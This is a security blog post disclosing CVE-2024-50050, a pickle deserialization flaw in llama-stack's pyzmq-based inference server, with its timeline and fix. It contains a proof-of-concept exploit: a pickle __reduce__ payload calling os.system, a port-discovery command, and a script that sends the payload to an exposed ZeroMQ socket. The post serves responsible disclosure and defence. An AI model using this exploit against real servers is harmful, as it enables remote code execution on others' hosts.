Overview

CVE-2024-50050: Critical Vulnerability in meta-llama/llama-stack by Meta

Recently, the Oligo research team has been taking a careful look at open-source Artificial Intelligence (AI) frameworks to assess the security of tools that enterprises are leveraging more and more. Through our analysis, we have noticed a common thread among several of these frameworks: they use an open-source library (pyzmq) in an unsafe way, which enables arbitrary code execution by attackers.

To shed light on this foundational issue, this blog is Part 1 of a series on vulnerabilities that Oligo has uncovered related to the misuse of the pyzmq open-source library. More to come, but please read on to learn about CVE-2024-50050, a critical vulnerability in the GenAI open-source framework meta-llama, which could enable arbitrary code execution on servers, leading to consequences such as resource theft, data breaches, and even control over hosted AI models.

TL;DR on CVE-2024-50050

The Oligo research team has discovered a critical vulnerability in meta-llama, an open-source framework from Meta for building and deploying GenAI applications. The vulnerability, CVE-2024-50050, enables attackers to execute arbitrary code on the llama-stack inference server from the network.

Snyk assigned this vulnerability a CVSS score of 9.3 (critical) under CVSS version 4.0 and 9.8 (critical) under CVSS version 3.1. While the vulnerability is still pending analysis by NVD, it received a CVSS score of 6.3 (medium) from Meta, which issued the CVE following our report.

The high CVSS score is due to the nature of the vulnerability. Affected versions of meta-llama are vulnerable to deserialization of untrusted data, meaning that an attacker can execute arbitrary code by sending malicious data that is deserialized. 

The vulnerability was quickly patched by Meta’s security teams, and it is critical that all users upgrade to version 0.0.41 or higher. 

Llama Stack

Llama Stack is an open-source framework developed by Meta to streamline the development and deployment of GenAI applications, particularly those using Meta's Llama models. It aims to accelerate innovation in the AI space by providing a consistent set of building blocks that span the entire development lifecycle, from model training to production deployment.

The Llama Stack framework combines interconnected APIs and tools that seamlessly enable users and partners to develop, deploy, and optimize GenAI applications. By integrating capabilities like inference, safety, memory management, and evaluation, it provides a cohesive ecosystem for building powerful and adaptable AI solutions.

Llama-stack was introduced by Meta in July 2024 to support the Llama family of models. It is backed by the biggest partners in the AI ecosystem, such as AWS, Groq, NVIDIA, Ollama, TogetherAI, Dell, and more.


Llama Stack has gained significant traction in the AI development community, with several major tech companies and cloud providers offering support for its APIs. Some notable partners include AWS Bedrock, Fireworks.ai, Together AI, Text Generation Inference (TGI), and more. These integrations are not the default, and are unaffected by the vulnerability, which is rooted in the default inference implementation (“Meta Reference”).


Finding The Vulnerability

Our research team came across llama-stack as it was gaining traction across the ecosystem - it has become the official way to use Meta’s Llama models. It offers a variety of integrations behind a single API specification. For example, products such as vLLM or AWS Bedrock can handle the inference part of your application pipeline (bring your own implementation).

meta-llama had only 200 stars when we discovered the vulnerability and has since catapulted to nearly 6,000 in just a few months. 

3 months later, meta-llama has more than 5000 stars!

We identified a code execution vulnerability that affects hosts running llama-stack. The vulnerability resides in the default Meta Reference Python Inference API implementation, in the run_inference method:

The vulnerable method in llama-stack

This method leverages recv_pyobj to receive serialized Python objects, which are automatically deserialized using Python’s pickle module. However, pickle is inherently insecure when used with untrusted data, as it can execute arbitrary code during the deserialization process. In scenarios where the ZeroMQ socket is exposed over the network, attackers could exploit this vulnerability by sending crafted malicious objects to the socket. Since recv_pyobj will unpickle these objects, an attacker could achieve remote code execution (RCE) on the host machine.
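
For illustration, here is a minimal sketch of the vulnerable pattern. The socket type, port, and handling loop are simplified assumptions for readability; see the llama-stack source linked below for the actual implementation:

    import zmq

    # Simplified, hypothetical sketch of the vulnerable server-side pattern
    context = zmq.Context()
    socket = context.socket(zmq.PULL)  # assumed socket type
    socket.bind("tcp://0.0.0.0:5555")  # if exposed, anyone on the network can write to it

    while True:
        # recv_pyobj() runs pickle.loads on whatever bytes arrive, so a
        # crafted payload executes code before any validation can happen
        request = socket.recv_pyobj()
        print("received request:", request)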

Besides the main API of llama-stack, we noticed that another TCP server is used for inter-process communication, leveraging a robust messaging library called ZeroMQ.

The pyzmq dependency

Llama-stack uses pyzmq (the Python bindings for ZeroMQ) for efficient communication and fast messaging. The recv_pyobj method was added to pyzmq approximately 8 years ago. The implementation of the function is only 2 lines:

    def recv_pyobj(self, flags: int = 0) -> Any:
        # Receive raw bytes from the socket
        msg = self.recv(flags)
        # Deserialize them with pickle.loads -- no validation of the payload
        return self._deserialize(msg, pickle.loads)

The Python code above does the following:

  1. Receive pickled data from the socket
  2. Pass it to _deserialize along with pickle.loads for unpickling

_deserialize runs the deserialization method passed to it as the second parameter. In the case of recv_pyobj, that method is pickle.loads. This means that data from an unverified source is unpickled, making the call unsafe and vulnerable by design.

Unsafe use of pickle has led to numerous remote code execution CVEs in recent years:
- https://www.cve.org/CVERecord?id=CVE-2022-34668
- https://www.vicarius.io/vsociety/posts/rce-in-python-nltk-cve-2024-39705-39706
- https://www.oligo.security/blog/tensorflow-keras-downgrade-attack-cve-2024-3660-bypass
We have presented many more examples, drawn from open-source documentation, at CNCF conferences.

Using recv_pyobj can be risky

The maintainer of pyzmq agreed that this usage is indeed unsafe:

… shouldn’t be used except for trusted sources, just like pickle itself. The choice to run this on an open socket isn’t a choice pyzmq makes, but sounds like meta-llama made an unsafe choice! …

The Meta Reference implementation’s Python server uses pyzmq, specifically recv_pyobj(), which accepts data from a network socket (one that anyone could write to). This data is unpickled automatically using the unsafe method pickle.loads, which will deserialize ANY Python object, including dangerous ones:

  1. https://github.com/meta-llama/llama-stack/blob/3c99f08267bca8eabaaa0b8092ca82c92291cf3f/llama_stack/providers/impls/meta_reference/inference/parallel_utils.py#L249
  2. https://github.com/meta-llama/llama-stack/blob/3c99f08267bca8eabaaa0b8092ca82c92291cf3f/llama_stack/providers/impls/meta_reference/inference/parallel_utils.py#L261

The pickle.loads method can be abused to achieve arbitrary code execution.

POC

The following PoC searches for open ZMQ ports on the same host and writes a malicious pickled object to any socket it finds open, using the send_pyobj() method.

When the victim process calls recv_pyobj(), it executes the pickled code during deserialization, which leads to arbitrary code execution.

To exploit this vulnerability, it’s essential to understand how a pickle exploit works. To demonstrate, we created a simple class called RCE:

    class RCE:
        def __reduce__(self):
            # Called by pickle to decide how to rebuild the object on load;
            # here it instructs pickle to call os.system(cmd) instead
            import os
            cmd = 'touch /tmp/pickle_rce_created_this_file.txt && echo RCE'
            return os.system, (cmd,)

When pickle.loads deserializes an object, it looks for methods like __reduce__ or __reduce_ex__ on that object, which define how the object should be restored. If either of these methods is implemented, it allows the object to specify custom behavior for its deserialization. This flexibility, unfortunately, can be exploited because __reduce__ can include code that executes arbitrary commands when the object is unpickled.
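
To see this in action, serializing an instance of the RCE class above and then deserializing it is enough to run the embedded command - no method on the object ever needs to be called explicitly:

    import pickle

    # Serializing the object embeds the os.system call in the payload...
    payload = pickle.dumps(RCE())

    # ...and deserializing it anywhere runs that call immediately, creating
    # /tmp/pickle_rce_created_this_file.txt on the deserializing host
    pickle.loads(payload)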

With our payload ready, the next step is to identify open llama-stack ports. We can use the following command to check for listening Python processes:

    lsof -iTCP -sTCP:LISTEN | grep -i python | awk '{print $9}'

Alternatively, we can use nmap to scan ports on remote hosts.

Once we have the payload and the zmq port, we can serialize our RCE class using pickle.dumps, send it to the zmq socket, and achieve remote code execution (RCE).
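
Putting it together, an attacker-side sketch might look like the following. The port and the ZeroMQ socket type are assumptions - the socket type must pair with whatever type the server binds:

    import pickle
    import zmq

    # Connect to the ZeroMQ endpoint discovered via lsof/nmap (port assumed)
    context = zmq.Context()
    sock = context.socket(zmq.PUSH)  # must pair with the server's socket type
    sock.connect("tcp://127.0.0.1:5555")

    # Send the pickled RCE object; the victim's recv_pyobj() unpickles it
    # and __reduce__ runs os.system on the victim host.
    # (sock.send_pyobj(RCE()) is equivalent - it pickles internally.)
    sock.send(pickle.dumps(RCE()))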

How Oligo detects the vulnerability

While SCA (software composition analysis) tools fail to identify shadow vulnerabilities like the one in llama-stack, real-time detection is essential for identifying and mitigating these threats at the moment they are exploited.

Oligo ADR addresses this gap by maintaining an extensive and constantly updated database of runtime profiles for numerous third-party libraries. The Oligo platform leverages these profiles to identify unusual library behavior, signaling the initiation or progression of an exploit.

For the llama-stack library, Oligo’s prebuilt profiles have never recorded legitimate instances of code execution within the Pickle processing flow. Consequently, Oligo swiftly flags any attempt to trigger injection exploits, automatically generating an incident report in the Oligo ADR platform, even in the absence of a CVE related to llama-stack.

The attack graph (Evidence) in the Oligo Platform after running the POC exploit on a demo cluster.
The ADR profile violation detection, based on the Python call stack (fetched with eBPF) and library-level profile deviation (in red).

Responsible Disclosure - CVE-2024-50050 (CVSS Score 9.3)

We reported the security issue to Meta following responsible disclosure practices. Meta’s security team was cooperative and responsive, quickly replying to our report with contact details and guidelines on how to disclose vulnerabilities through a GitHub issue.

The patch was applied in version 0.0.41 (llama-stack>=0.0.41).

In the fix, the pickle-based serialization (which allows a vast variety of Python objects to be serialized) was replaced with an elegant, type-safe Pydantic JSON implementation across the API.
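
Conceptually, the safer pattern looks something like the sketch below, using Pydantic v2 APIs. The model and field names here are hypothetical, not the actual llama-stack schemas; the point is that only fields declared on the model can be parsed, and no code runs during deserialization:

    import zmq
    from pydantic import BaseModel

    # Hypothetical request schema - the real llama-stack models differ
    class InferenceRequest(BaseModel):
        prompt: str
        max_tokens: int = 128

    def send_request(sock: zmq.Socket, req: InferenceRequest) -> None:
        # JSON carries only data, never executable objects
        sock.send_string(req.model_dump_json())

    def recv_request(sock: zmq.Socket) -> InferenceRequest:
        # Validation rejects any message that doesn't match the schema
        return InferenceRequest.model_validate_json(sock.recv_string())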

pyzmq also issued a fix, with a clear warning about the implications of using recv_pyobj with untrusted data: https://github.com/zeromq/pyzmq/commit/f4e9f17fe1c370edfe5c4b33b9594d1da907a87e

Responsible Disclosure Timeline

29 Sep, 2024 - Oligo reported the vulnerability to Meta.

30 Sep, 2024 - Meta performed an initial evaluation of the report.

1 Oct, 2024 - Meta confirmed that the relevant teams were working on a fix.

10 Oct, 2024 - Meta released a fix on GitHub and published version 0.0.41 to PyPI.

24 Oct, 2024 - Meta issued CVE-2024-50050.

Final Notes

Meta-llama is a robust framework for building generative AI applications, which we highly recommend. It sets a new standard for open-source LLM frameworks, thanks to its rich end-to-end features, layered architecture, partner network, and growing number of SDKs.

To help avoid similar issues in the future, pyzmq’s amazing maintainers have significantly improved the documentation around these methods. The pyzmq examples now use secure best practices for transferring data between processes in a signed manner. Such work is deeply appreciated, is not taken for granted, and will help protect organizations.

Meta is a true pioneer of open-source AI and is behind some of the best open-source models to date - the Llama family of models - but even the largest companies are exposed to shadow vulnerabilities. In upcoming blog posts, we will highlight other vulnerabilities that have surfaced as a result of the misuse of pyzmq. Stay tuned!
